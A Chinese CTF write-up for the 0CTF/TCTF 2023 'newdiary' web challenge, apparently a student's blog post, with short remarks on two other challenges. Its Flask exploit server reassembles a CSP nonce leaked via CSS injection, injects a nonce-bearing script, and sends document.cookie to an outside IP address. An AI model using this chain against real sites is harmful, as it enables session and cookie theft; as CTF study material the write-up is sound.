另外两道 web 不会了，我好菜

newdiary 这题还是跟队友一起出的，一开始想的两个为一组，后面想了想，三个为一组更有效一些

0CTF/TCTF 2023 newdiary

主打一个暴力！css 注入以三个为一组来 leak nonce，接收到无序的 nonce 片段之后，再写一个小小的算法来拼接出正确 nonce

I wrote yet another new diary website for myself! Wait, someone keeps reporting something to me? Let me create a bot to save my life…

Challenge: http://new-diary.ctf.0ops.sjtu.cn/

Source: https://s3.jcloud.sjtu.edu.cn/962eeeff2d0148c1b17df3c8225da79a-ctf/newdiary_e52f7db7c5864cf32ae33adbe50ba4f4.zip

The original code is from Codegate 2023. The original author in the package.json @as3617 is not involved in this challenge. The solution is completely different so you do not need to worry about not attending the prior competition!

from flask import Flask, request, session

app = Flask(__name__)

def complete_string(start, fragments):
    # 将起始字符串加入结果中
    result = start
    # 当还有片段时，继续循环

    while fragments:
        for i, fragment in enumerate(fragments):
            # 如果片段的前两个字符与结果的最后两个字符匹配，加入这个片段的最后一个字符
            if fragment[:2] == result[-2:]:
                result += fragment[-1]

                # 从片段列表中移除已经使用的片段
                fragments.pop(i)
                break
    # 加入结束字符串
    print(len(result))
    return result

def find_start(fragments):
    for i, fragment in enumerate(fragments):
        a = True
        for fragment2 in fragments:
            if fragment[:2] == fragment2[-2:]:
                a = False
                break
        if a:
            start = fragment
            fragments.pop(i)
            return start, fragments

fragments = []
nonce = ""

@app.route('/')
def home():
    global fragments, nonce
    if request.args.get('p'):
        p = request.args.get('p')
        fragments.append(p)
        if len(fragments) == 30:
            start, fragments = find_start(fragments)
            nonce = complete_string(start, fragments)
    return ''

@app.route('/exploit')
def about():
    global nonce
    return f'''
<body onload='form.submit()'>
    <form id='form' action='http://localhost/write', method='POST'>
    <input type='text' name='title' value='exploit'/>
    <input name='content' value='<iframe srcdoc="<script nonce={nonce} src=http://8.134.216.221:1234/1.js></script>"></iframe>'>
    </form>
</body>
'''

@app.route('/1.js')
def js():
    return f'''
fetch("http://8.134.216.221:1234/flag?flag="+document.cookie)
'''

@app.route('/flag')
def flag():
    print(request.args.get('flag'))
    return 'ok'

@app.route('/start')
def start():
    # http://localhost/share/read#id=29&username=teltel ->
    # <link rel="stylesheet" href="https://unpkg.com/[email protected]/1.css">
    return '''<script>
a = window.open("http://localhost/share/read#id=29&username=teltel");
function leak(){
    b = window.open("http://8.134.216.221:1234/exploit");
    function leak2(){
        b.location = "http://localhost/share_diary/0"
        function leak3() {
            a.location = "http://localhost/share/read#id=0"
        }
        setTimeout(leak3,3000);
    }
    setTimeout(leak2,3000);
}
setTimeout(leak,3000);</script>
'''

if __name__ == '__main__':
    app.run(debug=True,port=1234,host="0.0.0.0")

olapinfra

Behold! The epitome of stylish Internet infrastructure! Trailing closely behind the likes of LLM, Cloud Native, Web3, low-code platforms, and anything else you can imagine!

(After the instance successfully runs, the service is still in the process of initialization. You may need to wait for >= 1 min before you can attack it. So run it locally before you can get the flag.)

attachment https://s3.jcloud.sjtu.edu.cn/962eeeff2d0148c1b17df3c8225da79a-ctf/olapinfra-69e73ebe082712b26f2a3e63b3d323f17e0a9cbc4647df85f51bd672b67ca168.tar.xz

jdbc js script rce ?不是很习惯这种翻文档搞新东西的（其实很多新打法，里面也藏着一些旧的内容

ezjava

Finally, we build our new curl website! We are not afraid. We do not care others. We can live together even on another planet.

In solitude, where we are least alone.

盲盒，没懂

之后再补题吧，先复习期末，还有写好多大作业